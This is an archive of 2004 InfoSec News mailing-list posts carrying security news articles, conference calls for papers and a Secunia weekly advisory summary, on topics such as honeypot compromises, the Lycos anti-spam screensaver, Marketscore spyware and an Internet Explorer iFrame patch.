From isn at c4i.org Wed Dec 1 06:09:48 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 1 06:30:09 2004 Subject: [ISN] Unprotected PCs Fall To Hacker Bots In Just Four Minutes Message-ID: http://www.techweb.com/wire/security/54201306 By Gregg Keizer TechWeb.com November 30, 2004 The lifespan of a poorly protected PC connected to the Internet is a mere four minutes, research released Tuesday claimed. After that, it's owned by a hacker. In the two-week test, marketing-communications firm AvanteGarde deployed half a dozen systems in "honeypot" style, using default security settings. It then analyzed the machines' performance by tallying the attacks, counting the number of compromises, and timing how long it took an attack to successfully hijack a computer once it was connected to the Internet. The six machines were equipped with Microsoft Windows Small Business Server 2003, Microsoft Windows XP Service Pack 1 (SP1), Microsoft Windows XP SP1 with the free ZoneAlarm personal firewall, Microsoft Windows XP SP2, Macintosh OS X 10.3.5, and Linspire's distribution of Linux. Not surprisingly, Windows XP SP1 sans third-party firewall had the poorest showing. "In some instances, someone had taken complete control of the machine in as little as 30 seconds," said Marcus Colombano, a partner with AvanteGarde, and, along with former hacker Kevin Mitnick, a co-investigator in the experiment. "The average was just four minutes. Think about that. Plug in a new PC--and many are still sold with Windows XP SP1--to a DSL line, go get a cup of coffee, and come back to find your machine has been taken over." Windows XP SP1 with the for-free ZoneAlarm firewall, however, as well as Windows XP SP2, fared much better. Although both configurations were probed by attackers, neither was compromised during the two weeks. "If you're running a firewall so your machine is not seen, you're less likely to be attacked," said Colombano. "The bot or worm simply goes onto the next machine." Although Windows XP SP1 includes a firewall, it's not turned on by default. That security hole was one of those plugged--and heavily touted--by Microsoft in SP2. The successful attacks took advantage of weak passwords on the target machines, as well as a pair of long-patched vulnerabilities in Microsoft Windows. One, the DCOM vulnerability, harks back to July, 2003, and was behind the vicious MSBlast worm of that summer. The second, dubbed the LSASS vulnerability, was first disclosed in April, 2004, and led to the Sasser worm. The most secure system during the experiment was the one running Linspire's Linux. Out of the box, Linspire left only one open port. While it reacted to ping requests by automated attackers sniffing for victims, it experienced the fewest attacks of any of the six machines and was never compromised, since there were no exposed ports (and thus services) to exploit. The Macintosh machine, on the other hand, was assaulted as often as the Windows XP SP1 box, but never was grabbed by a hacker, thanks to the tunnel vision that attackers have for Windows. "The automated bot/worm attackers were exclusively using Windows-based attacks," said Colombano, so Mac and Linux machines are safe. For now. "[But] it would have been very vulnerable had code been written to compromise its system," he added. For the bulk of users who work with Windows, however, Colombano didn't recommend dumping Redmond's OS and scurrying for the protection of hacker-ignored platforms. "Update Windows regularly with Microsoft's patches, use a personal firewall--third-party firewalls still have their place, since Microsoft's isn't suited to guard against outbound attacks--keep secure passwords, and use some type of anti-virus and anti-spyware software," he advised. Of the list, the firewall is the most important. The study concluded, for example, that Linux- and Windows-based machines using an application firewall were the best at preventing attacks. "No machine is immune," he counseled. "No human is safe from every virus, and it's the same for machines. That's why people have to have some personal responsibility about security. You have to be a good citizen on the network, so you're not only protecting yourself, but others who might be attacked from exploits originating on your machine." From isn at c4i.org Wed Dec 1 06:09:33 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 1 06:30:11 2004 Subject: [ISN] Black Hat CFPs now open: Europe and Asia Message-ID: Forwarded from: Jeff Moss -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello ISN, I've been a bit quiet lately, but with Thanksgiving over I wanted to announce our latest round of CFPs. BLACK HAT BRIEFINGS CALL FOR PAPERS EUROPE AND ASIA The Black Hat Briefings was created to fill the need for computer security professionals to better understand the security risks to information infrastructures and computer systems. What makes Black Hat Briefings different? The speakers. We select the speakers that are doing unique research, writing the security tools, or finding the bugs. No vendor pitches. Just straight talk from people who are experts in their chosen field of study. This year our Europe and Asia shows will be held back-to-back, potential presenters are invited to submit CFP's to both shows. If you have original research, new tools, or a fresh perspective on an old problem, we encourage you to submit a presentation. By presenting at the Black Hat Briefings you have the opportunity to both influence your peers and to contribute to the advancement of the state of the art. We are striving to create a high-end technical conference and any talk that helps reach this goal will be given extra attention. Topics of discussion will include zero day attacks and defenses, deep knowledge, policy, management, and the law. If you have a speech idea you believe is of Black Hat caliber, do not hesitate to submit it, even if it does not appear to match an existing track. If you have never been to a Black Hat event, please check out our past presentations on-line to get a feel for what we are looking for: http://www.blackhat.com/html/bh-multimedia-archives-index.html Please do not wait to submit. Presentations are selected and evaluated in the order received. Full and detailed explanations are available at: http://www.blackhat.com/html/bh-europe-05/bh-eu-asia-05-cfp.html Important Dates January 15th 2005: Call for Papers closes for Black Hat Europe and Asia 2005. Please submit now TBD: Early Bird Discount Rate for registration closes February 15th 2005: Black Hat USA Call for Papers opens February 16th 2005: Conference & Group discount rates at the Grand Hotel Krasnapolsky, Amsterdam closes March 29-20th 2005: Black Hat Europe 2005 Training March 31st to April 1st 2005: Black Hat Europe 2005 Briefings April 5-6th 2005: Black Hat Asia 2005 Training April 7-8th 2005: Black Hat Asia 2005 Briefings July 24-27th 2005: Black Hat Trainings, Caesars Palace, Las Vegas Nevada, USA July 28-29th 2005: Black Hat Briefings, Caesars Palace, Las Vegas Nevada, USA -----BEGIN PGP SIGNATURE----- Version: PGP 8.0.3 iQEVAwUBQawezEqsDNqTZ/G1AQLcOAf/XhyKp4NxdjWMx5RtRFajnSlEnxNLZhEW nOhvMUuz4mGkHFviIPwrqbaGKuQRt8syzKHZeNoh7Ynlm02WasCEk+90r2PJFUFT dlBs9aVFdpx1d8lEoZru8eXbYvZ0zHRTexc6hWHW6GW92aV7xWeFc7Fj5h4ctHkB rX8dM3u1EVE2rz0cv6EYAeAxhK3h0xbP4o5OafwfvEsNtXKC8V4Rw6+b/xnpNhMv AyrMaXrGdsqB6y2ZMW28NCALQW+bbZ2f1GGHz06Vm4eC7Gr6Ge2X/AezuXDb/RGO ZYZzsvzHWcUN1s5NX5WtCRqhjV0t2RaBPWNi3lRU45xHrbqC5J9u0A== =eol8 -----END PGP SIGNATURE----- From isn at c4i.org Wed Dec 1 06:09:10 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 1 06:30:13 2004 Subject: [ISN] Lycos anti-spam site hit by hackers Message-ID: http://news.zdnet.co.uk/internet/security/0,39020375,39175578,00.htm Munir Kotadia ZDNet Australia December 01, 2004 Spammers are suspected of hacking into and downing Lycos's anti-spam Web site just hours after it went live. The Web site is currently inaccessible and could also be the victim of a DDoS attack. Lycos on Tuesday kicked off its "make love not spam" campaign by offering users a screensaver that helps to launch distributed denial-of-service (DDoS) attacks on spammers' Web sites. The company said the screensaver uses the idle processing power of a computer to slow down the response times from spammers' Web sites - much in the same way spammers use compromised PCs to distribute unsolicited email messages. However, within hours of the makelovenotspam.com site being launched, the original front page was replaced with a simple message: "Yes, attacking spammers is wrong. You know this, you shouldn't be doing it. Your IP address and request have been logged and will be reported to your ISP for further action." Finnish antivirus firm F-Secure, which advised users not to participate in Lycos' campaign because of "possible legal problems", suspects the site has been hacked by a pro-spam group because "they definitely would have a motive to attack the site". F-Secure reported that the Web site had returned to normal by around 6 a.m. (Sydney time) but at the time of writing makelovenotspam.com was unavailable and could be under a retaliatory DDoS attack. Earlier this year, Symbiot, a Texas-based security firm launched a corporate defence system that was designed to fight back against DDoS and hacker attacks by launching a counter-strike. At the time, Symbiot's president Mike Erwin said that "totally passive" defences were "not an adequate deterrent" and argued that for complete defence an "offensive tactic must be employed". Security experts were alarmed at the company's attitude and warned that such tactics could be counterproductive. Jay Heiser, chief analyst at IT risk management company TruSecure, said Symbiot's proposal was a very bad criterion for choosing risk-reduction measures. "There is no evidence that this is the most effective way to deal with the problems and there is quite a bit of historical precedence that indicates it is totally counterproductive," said Heiser. Lycos was unavailable for comment. ZDNet Australia's Munir Kotadia reported from Sydney. From isn at c4i.org Wed Dec 1 06:10:04 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 1 06:30:14 2004 Subject: [ISN] Stressing security training Message-ID: Forwarded from: William Knowles http://www.fcw.com/geb/articles/2004/1129/web-secure-11-30-04.asp By Florence Olsen Nov. 30, 2004 Teaching basic computer security has become an essential part of training government employees, and agency officials who neglect security education will regret it, said David Jordan, chief information security officer for Arlington County, Va. Employees who are aware of the pitfalls of using computers connected to the Internet are "the most powerful weapons against cyberthreats that you can have," he told Federal Computer Week during a Nov. 29 interview. That's why Jordan said he spends 15 to 20 minutes with all new county government employees talking to them about cybersecurity. And it's why he sends computer and network security information to employees on a biweekly basis via the county's electronic newsletter. For the latter, he solicits the help of editors in the county's communications office. Information security officers, he said, should cultivate good relationships with communications experts who can help them teach employees how to avoid being victims of computer worms and viruses. Editors can take a security officer's message and craft it to suit to the audience, Jordan said. Company officials who sell computer security products also recognize the role user awareness plays in protecting computers and networks from malicious software code. Security policies and firewalls alone won't provide adequate protection, said Kathy Coe, regional director of educational services at Symantec, which makes antivirus and other security software. Last year, for example, officials at a federal financial institution tested employees' adherence to the agency's computer security policy against opening e-mail attachments from unknown sources. About half of the employees failed the test, Coe said. Against agency policy, they opened an e-mail attachment that purported to show a traffic snarl in Washington, D.C., after a North Carolina tobacco farmer drove his tractor into a shallow pond on the National Mall. Without consistent and continuous user awareness training, Coe said, all of us are easy prey. *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ---------------------------------------------------------------- C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Wed Dec 1 06:10:19 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 1 06:30:16 2004 Subject: [ISN] Universities struggling with SSL-busting spyware Message-ID: http://www.nwfusion.com/news/2004/1130univestrug.html By Paul Roberts IDG News Service 11/30/04 U.S. universities are struggling with a flare-up of dangerous spyware that can snoop on information encrypted using SSL. Experts are warning that the stealthy software, called Marketscore, could be used to intercept a wide range of sensitive information, including passwords and health and financial data. In recent weeks, information technology departments at a number of universities issued warnings about problems caused by the Marketscore software, which promises to speed up Web browsing. The program, which routes all user traffic through its own network of servers, poses a real threat to user privacy, security experts agree. Columbia University, Cornell University, Indiana University, The State University of New York (SUNY) at Albany, and The Pennsylvania State University are among those noting an increase in the number of systems running Marketscore software in recent weeks. Each institution warned their users about Marketscore and posted instructions for removing the software. The software is bundled with iMesh peer-to-peer software, and may have made it onto university networks that way, said David Escalante, director of computer security at Boston College. The company that makes the software, Marketscore, has headquarters in Reston, Va., at the same mailing address as online behavior tracking company comScore Networks. ComScore Networks did not respond to repeated requests for comment. Reports of infected systems on campuses ranged from a handful up to about 200 on one large campus network, Escalante said. Marketscore is just the latest incarnation of a spyware program called Netsetter, which first appeared in January, said Sam Curry, vice president of eTrust Security Management at Computer Associates. "Basically it takes all your Web traffic and forces it through its own proxy servers," he said. Ostensibly, the redirection speeds up Web surfing, because pages cached on Marketscore's servers load faster than they would if they were served directly from the actual Web servers for sites such as Google.com or Yahoo.com. However, those performance benefits have been elusive. "People who have installed the software complain to us that they're not getting any improvement," Curry said. Richard Smith, an independent software consultant in Boston, is also skeptical of performance improvement claims made by Marketscore and others, especially since many Internet service providers already offer Web caching for their dial-up customers, he said in an e-mail message. At Cornell, the university IT Security Office blocked connections between Cornell's network and the Marketscore servers, according to a message posted on the university's Web site. Administrators at SUNY Albany took similar steps, according to a message posted on that university's Web site. While other legal software programs make similar claims about improving Web browsing speed as Marketscore, Internet security experts are troubled that the software creates its own trusted certificate authority on computers. That certificate authority intercepts Web communications secured using SSL, decrypting that traffic, then sending it to the Marketscore servers before encrypting the traffic and passing it along to its final destination. That traffic could include sensitive information, including passwords, credit card and Social Security numbers, Curry said. Marketscore should be a big concern for companies -- especially those like banks with employees who handle sensitive data, Escalante said. "I don't know how good it is for parties on either end of a transaction to have a third party listening in," he said. If nothing else, all the extra decrypting and encrypting slows down SSL traffic, casting doubt on Marketscore's claims to be an Internet accelerator, Smith said. CA's eTrust anti-virus software labeled Marketscore "spyware" up until June of this year, but stopped doing so after Marketscore appealed that designation using an established vendor appeal process, he said. CA is currently re-evaluating the "spyware" designation using a complicated, multifactor scoring system. The software is less repugnant than its predecessor, Netsetter, which did not clearly disclose to users what it did when installed and made itself difficult to remove. Marketscore is better on both those counts, clearly stating both in the end user license agreement and during the installation process what the product does, and providing users with an easy uninstall program. CA considers Marketscore an example of a new breed of software that lies in the gray area between spyware and legitimate software, Curry said. "Under the old definition, (Marketscore) clearly qualified as spyware. But there are new categories emerging," he said. While Marketscore clearly tracks user behavior, it doesn't hijack Web browser home pages, spew pop-up advertisements or conceal its presence, like earlier generations of spyware did, Curry said. "There's more granularity. Companies have responded and ... are adding benefits and value to these programs. We're looking at ways to more accurately identify this," he said. Perhaps trying to increase its appeal, Marketscore is now advertising itself as an e-mail protection service, in addition to an Internet accelerator. According to the Marketscore.com Web site, members will receive Symantec's CarrierScan Server anti-virus technology at no cost. However, that promise doesn't sit well with Symantec, which said it has no relationship with Marketscore and, in fact, considers the software "spyware," said Genevieve Haldeman, a company spokeswoman. "We don't have relationships with companies that make software we consider malicious," she said. Symantec is considering legal action to force Marketscore to stop using its name and logo on the Marketscore.com Web site, she said. Spyware or not, the lesson of Marketscore is that "if it sounds too good to be true, it probably is," Curry said. From isn at c4i.org Wed Dec 1 06:10:34 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 1 06:30:18 2004 Subject: [ISN] FBI's Cyber-Crime Chief Relates Struggle for Top Talent Message-ID: http://www.eweek.com/article2/0,1759,1733838,00.asp By Ryan Naraine November 30, 2004 The FBI's inability to recruit and keep the best available IT talent has proven to be one of the biggest challenges facing the government's Internet Crime Complaint Center (I3C), a senior official said Tuesday. Delivering the keynote address on the opening day of Ziff Davis Media's Security Virtual Tradeshow, I3C chief Daniel Larkin said the center's staffing problems underline the need for deeper cooperation between the FBI and the IT industry to win the battle against sophisticated cyber-criminals. "We can't recruit and keep the best available minds in the IT world. They come, stay a few years and move on because, ultimately, we can't pay what the industry pays for talent," Larkin said, adding that the bureau also has experienced difficulties with keeping pace with employees' training needs. Because of those shortcomings, Larkin said, the I3C spent the past four years forging partnerships with the biggest names in the tech industry to share expertise, coordinate on intelligence and develop best practices and protocols for fighting cyber-crime. He said the unit has come a long way since its creation in 2000 as the Internet Fraud Complaint Center (IFCC). Originally formed as partnership between the FBI and the National White Collar Crime Center (NW3C) to fight online fraud, Larkin said the unit had to evolve to keep up with the rapidly changing face of crime on the Internet. The I3C now tackles a range of criminal schemes on the Internet, including spam, phishing, spoofed or hijacked bank accounts, international reshipping schemes with origins in West Africa, cyber-extortion, computer intrusions and economic espionage. Larkin discussed several major highlights over the years, including "Operation Web Snare" in August, which led to the arrests or convictions of more than 150 individuals and the return of 117 criminal complaints and indictments. Operation Web Snare was a collaborative effort that included work by 36 U.S. Attorney's offices nationwide, the criminal division of the Department of Justice, 37 of the FBI's 56 field divisions, 13 of the Postal Inspection Service's 18 field divisions, and the Federal Trade Commission, together with a variety of other federal, state, local and foreign law enforcement agencies. Larkin outlined the need to develop new training capabilities to keep up with online scammers who use multiple techniques to hoodwink Internet users into giving up sensitive personal data. "We can use individuals from academia and the tech industry to cross-pollinate resources and feed that to our cyber forensics labs to help build strong cases," he said. "The cycling of new resources into a project brings fresh minds and fresh tactics. That's much more desirable than someone who had been engaged for a few years," he added. "Originally, we were trying to create the mother of all databases to deal with online fraud. But with our staffing problems, we decided it was better to let the industry leaders do that," Larkin said, adding that the I3C now uses a simple, uniformed format for data collection that allows a high level of collaboration. "We act as a bridge between the industry groups and the task forces working the cases. We'll partner with all sides to ensure that information is flowing smoothly," he said. -=- Editor's Note: The Ziff Davis Media Security Virtual Tradeshow is run by eSeminars, a division of Ziff Davis Media, parent company of eWEEK.com. From isn at c4i.org Thu Dec 2 01:48:44 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 2 02:02:22 2004 Subject: [ISN] DallasCon Professional Cyber Defense Conference Message-ID: Forwarded from: DallasCon DallasCon Professional Cyber Defense Conference May 2-7, 2005 Dallas, Texas The wait is over! The fastest growing and the most respected security event in the Southwest is back for its 4th consecutive year. This year, DallasCon is focusing on a practical approach to Network and Wireless Security geared directly to the industry professionals. The event will feature 6-days of intense hands-on training and information on Network and Wireless Security. If you are a Technical Professional who is interested in learning the latest hacks, tricks, and threats in Information Security to protect your company's networks and assets, then you cannot miss DallasCon 2005! Don't Delay! To take advantage of the incredible pre-registration prices, you must register before February 15, 2005. For more information, to submit a paper, or to register visit: http://www.DallasCon.com. From isn at c4i.org Thu Dec 2 01:49:02 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 2 02:02:24 2004 Subject: [ISN] Tenet warns of terrorists combining physical, telecommunications attacks Message-ID: Forwarded from: William Knowles http://www.govexec.com/dailyfed/1204/120104c1.htm By Chris Strohm cstrohm@govexec.com December 1, 2004 Former CIA Director George Tenet on Wednesday said greater government regulation of the Internet and telecommunications networks is needed in order to guard against terrorist attacks. The U.S. intelligence community needs to consider how terrorists might attempt to couple an attack on telecommunication networks with a physical attack, Tenet said during a keynote speech at the E-Gov Institute's homeland security conference in Washington. "Efforts at physical security will not be enough, because the thinking enemy that we confront is going to school on our network vulnerabilities as well, and I think the two are inextricably linked," he said. "The number of known potential adversaries conducting research on information attacks is increasing rapidly and includes intelligence services, military organizations and nonstate entities." According to Tenet "a loose collection of regional [terrorist] networks" now "thrive independently" worldwide by using telecommunications and the Internet to communicate with and learn from each other at almost no cost. Telecommunications technology for government and business should have built-in protections, Tenet said, such as intrusion detection and protection systems, antivirus software, authentication and identify management services, and encryption. "I know that these actions would be controversial in this age where we still think the Internet is a free and open society with no control or accountability," he added. "But, ultimately, the Wild West must give way to governance and control." Many national media outlets were not allowed to attend Tenet's speech. The Associated Press reported that Tenet insisted that natoinal media be kept out, only allowing in reporters for trade publications that cover the government. Tenet was also critical of the direction that intelligence reform is taking in Washington. "There's a big focus on structural change at the top. My perspective is, this is all about data," he said. The U.S. government has "an enormous amount of knowledge" on terrorist activities that should be disseminated to state and local officials, Tenet continued. "We have to start treating them as equals with regard to data and teach them as much as we possibly can by pushing data to them at the lowest levels of classification. [We should] even begin a very serious process of learning how to write at the unclassified level so we can educate everybody about what we see going on in the world." "I really believe data sharing and the movement of data is the most critical feature of reform. I think that's where this game gets won and lost," he said. "We're having discussions about power relationships between people in Washington. At the end of day, I don't think that's the right conversation." Legislation to overhaul the U.S. intelligence community is currently stalled in Congress. A key component of that legislation is creating an intelligence director to oversee the nation's 15 intelligence agencies. Tenet reiterated criticism he expressed to the 9/11 commission earlier this year that the person leading U.S. intelligence agencies should be affiliated with an agency. "If you're not getting your hands dirty every day in terms of risk, I don't think you can lead the men and women of American intelligence, or capably inform the president," he said. *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ---------------------------------------------------------------- C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Thu Dec 2 01:49:14 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 2 02:02:26 2004 Subject: [ISN] Microsoft releases patch to plug IE vulnerability Message-ID: http://www.computerworld.com/securitytopics/security/story/0,10801,97957,00.html By Jaikumar Vijayan DECEMBER 01, 2004 COMPUTERWORLD As expected, Microsoft Corp. today released an out-of-cycle security bulletin and patch designed to fix a critical hole in the Internet Explorer Web browser that is already being widely exploited by attackers. The company also announced a change to Windows Update for three previously issued fixes from October for some users of Windows XP Service Pack 1. The vulnerability addressed by Microsoft's latest bulletin, MS04-040, was first disclosed on Oct. 24 and exists in the iFrame tags of Internet Explorer. The buffer overflow flaw allows attackers to take complete control of a compromised system and can be exploited by getting users to visit Web sites where malicious code can be downloaded. A proof-of-concept exploit named Bofra that takes advantage of the iFrame flaw has been available for several days and was used in launching attacks via banner ads last week that redirected users to rogue Web sites. "We are aware of some proof-of-concept code and public attacks" that take advantage of the flaw, said Stephen Toulouse, security program manager at Microsoft's security response center. That's why Microsoft is urging users to apply the latest patch as soon as possible, he added. The flaw doesn't affect users who have already installed XP SP2, he said. Meanwhile, Microsoft today reissued three of its fixes from October for users of SP1 who may not have been offered the updates earlier. The problem involves SP1 users who may have downloaded the SP2 patch but have not installed it on their computers yet. Microsoft's Windows Update and Automatic Updates service wouldnt have offered the October fixes automatically to such users, Toulouse said. Today's updates fixes the problem for those users. From isn at c4i.org Fri Dec 3 04:40:00 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 3 04:53:06 2004 Subject: [ISN] Secunia Weekly Summary - Issue: 2004-49 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2004-11-25 - 2004-12-02 This week : 40 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: Monitor, Filter, and Manage Security Information - Filtering and Management of Secunia advisories - Overview, documentation, and detailed reports - Alerting via email and SMS Request Trial: https://ca.secunia.com/?f=s ======================================================================== 2) This Week in Brief: ADVISORIES: Microsoft has issued a patch for Internet Explorer, which addresses a buffer overflow vulnerability (also known as the IFRAME vulnerability) in several HTML elements. The patch has been long awaited, and all users not running systems with Windows XP Service Pack 2 installed, are urged to install this update as soon as possible. See Secunia advisory below for patch links. References: http://secunia.com/SA12959 VIRUS ALERTS: Secunia has not issued any virus alerts during the last week. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA13269] Winamp "IN_CDDA.dll" Buffer Overflow Vulnerability 2. [SA12959] Internet Explorer HTML Elements Buffer Overflow Vulnerability 3. [SA13317] Microsoft Internet Explorer "Save Picture As" Image Download Spoofing 4. [SA13271] Sun Java Plug-in Sandbox Security Bypass Vulnerability 5. [SA12889] Microsoft Internet Explorer Two Vulnerabilities 6. [SA13328] Microsoft Windows WINS Replication Packet Handling Vulnerability 7. [SA13203] Microsoft Internet Explorer Two Vulnerabilities 8. [SA12758] Microsoft Word Document Parsing Buffer Overflow Vulnerability 9. [SA13334] WS_FTP Server FTP Commands Buffer Overflow Vulnerabilities 10. [SA13308] Linux Kernel Local DoS and Memory Content Disclosure Vulnerabilities ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA13334] WS_FTP Server FTP Commands Buffer Overflow Vulnerabilities [SA13318] MailEnable IMAP Service Buffer Overflow Vulnerabilities [SA13317] Microsoft Internet Explorer "Save Picture As" Image Download Spoofing [SA13328] Microsoft Windows WINS Replication Packet Handling Vulnerability [SA13333] JanaServer Two Denial of Service Vulnerabilities UNIX/Linux: [SA13349] Fedora update for cyrus-imapd [SA13346] Conectiva update for cyrus-imapd [SA13345] SUSE Updates For Multiple Packages [SA13341] Sun Solaris Netscape PNG Image Handling Vulnerabilities [SA13335] Fedora update for gaim [SA13332] Gentoo update for sun-jdk/sun-jre-bin/blackdown-jdk/blackdown-jre [SA13320] Debian update for tetex-bin [SA13315] Mandrake update for cyrus-imapd [SA13310] Debian update for cyrus-imapd [SA13309] Gentoo update for cyrus-imapd [SA13307] jabberd Client to Server Component Buffer Overflow Vulnerability [SA13344] Conectiva update for abiword [SA13338] Debian update for libgd [SA13337] Debian update for libgd2 [SA13323] Fedora update for squirrelmail [SA13339] SUSE update for kernel [SA13336] Fedora update for samba [SA13313] Debian update for yardradius [SA13312] YardRadius "process_menu()" Buffer Overflow Vulnerability [SA13354] Fedora update for iptables [SA13326] Gentoo update for opendchub [SA13325] Open DC Hub "RedirectAll" Buffer Overflow Vulnerability [SA13324] Gentoo update for phpwebsite [SA13322] Gentoo update for phpmyadmin [SA13343] Debian update for openssl [SA13340] Sun Solaris ping Utility Privilege Escalation Vulnerability [SA13316] Mandrake update for a2ps [SA13314] Mandrake update for zip [SA13308] Linux Kernel Local DoS and Memory Content Disclosure Vulnerabilities Other: Cross Platform: [SA13327] Orbz Password Field Buffer Overflow Vulnerability [SA13331] FreeImage Library Interleaved Bitmap Image Buffer Overflow Vulnerability [SA13329] Nuked-Klan "Links" Module Script Insertion Vulnerability [SA13319] YaBB Unspecified "shadow" Tags Script Insertion Vulnerability [SA13321] Groupmax World Wide Web Cross-Site Scripting and Directory Traversal [SA13330] IberAgents Clear Text User Credential Disclosure ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA13334] WS_FTP Server FTP Commands Buffer Overflow Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-30 Reed Arvin has discovered some vulnerabilities in WS_FTP Server, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13334/ -- [SA13318] MailEnable IMAP Service Buffer Overflow Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-26 Hat-Squad has reported two vulnerabilities in MailEnable Professional and MailEnable Enterprise Edition, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13318/ -- [SA13317] Microsoft Internet Explorer "Save Picture As" Image Download Spoofing Critical: Moderately critical Where: From remote Impact: Spoofing Released: 2004-11-26 cyber flash has discovered a vulnerability in Microsoft Internet Explorer, which can be exploited by malicious people to trick users into downloading malicious files. Full Advisory: http://secunia.com/advisories/13317/ -- [SA13328] Microsoft Windows WINS Replication Packet Handling Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2004-11-29 Nicolas Waisman has reported a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13328/ -- [SA13333] JanaServer Two Denial of Service Vulnerabilities Critical: Less critical Where: From local network Impact: DoS Released: 2004-12-01 Luigi Auriemma has reported two vulnerabilities in JanaServer, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13333/ UNIX/Linux:-- [SA13349] Fedora update for cyrus-imapd Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-02 Fedora has issued an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13349/ -- [SA13346] Conectiva update for cyrus-imapd Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-02 Conectiva has issued an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13346/ -- [SA13345] SUSE Updates For Multiple Packages Critical: Highly critical Where: From remote Impact: Security Bypass, DoS, System access Released: 2004-12-01 SUSE has issued updates for multiple packages. These fix various vulnerabilities, which can be exploited to bypass certain security functionality, cause a DoS (Denial-of-Service), and potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/13345/ -- [SA13341] Sun Solaris Netscape PNG Image Handling Vulnerabilities Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-01 Sun has acknowledged some vulnerabilities in the Netscape browser for Solaris, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a user's system. Full Advisory: http://secunia.com/advisories/13341/ -- [SA13335] Fedora update for gaim Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-30 Fedora has issued an update for gaim. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13335/ -- [SA13332] Gentoo update for sun-jdk/sun-jre-bin/blackdown-jdk/blackdown-jre Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-30 Gentoo has issued updates for sun-jdk, sun-jre-bin, blackdown-jdk, and blackdown-jre. These fix a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13332/ -- [SA13320] Debian update for tetex-bin Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-26 Debian has issued an update for tetex-bin. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13320/ -- [SA13315] Mandrake update for cyrus-imapd Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-26 MandrakeSoft has issued an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13315/ -- [SA13310] Debian update for cyrus-imapd Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-25 Debian has issued an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13310/ -- [SA13309] Gentoo update for cyrus-imapd Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-25 Gentoo has issued an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13309/ -- [SA13307] jabberd Client to Server Component Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-25 Zhaowei has reported a vulnerability in jabberd, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13307/ -- [SA13344] Conectiva update for abiword Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-02 Conectiva has issued an update for abiword. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13344/ -- [SA13338] Debian update for libgd Critical: Moderately critical Where: From remote Impact: System access Released: 2004-11-30 Debian has issued an update for libgd. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13338/ -- [SA13337] Debian update for libgd2 Critical: Moderately critical Where: From remote Impact: System access Released: 2004-11-30 Debian has issued an update for libgd2. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13337/ -- [SA13323] Fedora update for squirrelmail Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2004-11-29 Fedora has issued an update for SquirrelMail. This fixes a vulnerability, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/13323/ -- [SA13339] SUSE update for kernel Critical: Moderately critical Where: From local network Impact: Privilege escalation, DoS, 